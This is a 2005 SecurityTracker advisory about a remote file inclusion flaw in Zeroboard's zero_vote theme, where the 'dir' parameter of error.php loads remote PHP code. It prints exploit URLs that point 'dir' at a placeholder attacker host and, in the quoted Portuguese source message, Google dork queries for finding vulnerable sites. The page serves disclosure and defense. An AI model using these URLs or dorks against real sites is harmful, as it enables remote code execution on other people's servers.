Zeroboard 'zero_vote' Include File Bug Lets Remote Users Execute Arbitray Commands
|
SecurityTracker Alert ID: 1012812 |
SecurityTracker URL: http://securitytracker.com/id/1012812
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Jan 13 2005
|
Original Entry Date: Jan 9 2005
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
|
Description:
Optik4Lab reported an input validation vulnerability in Zeroboard in the zero_vote theme. A remote user can execute arbitrary commands on the target system.
The 'error.php' script does not properly validate user-supplied input in the 'dir' parameter. A remote user can supply a specially crafted URL to cause arbitrary PHP code from a remote location to be included and executed on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.
http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]
Aleks is credited with discovering this flaw.
The original advisory is available at:
http://www.optik4lab.com/modules/news/article.php?storyid=13
|
Impact:
A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the prvileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.nzeo.com/?channel=zeroboard (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: New Vulnerability
|
Zero_vote:
Um tema presente no zeroboard, se encontra com falha no seguinte arquivo:
Theme For ZEROBOARD
/skin/zero_vote/error.php
/skin/zero_vote/error.php?dir=http://[ATTACKER]
allinurl:/skin/zero_vote/error.php
allinurl:/zero_vote/error.php
http://www.exemplo.com/zeroboard/skin/zero_vote/error.php?dir=http://[ATTACKER]
Site:
http://www.optik4lab.com/modules/news/article.php?storyid=13
View This please,
Optik4Lab
|
|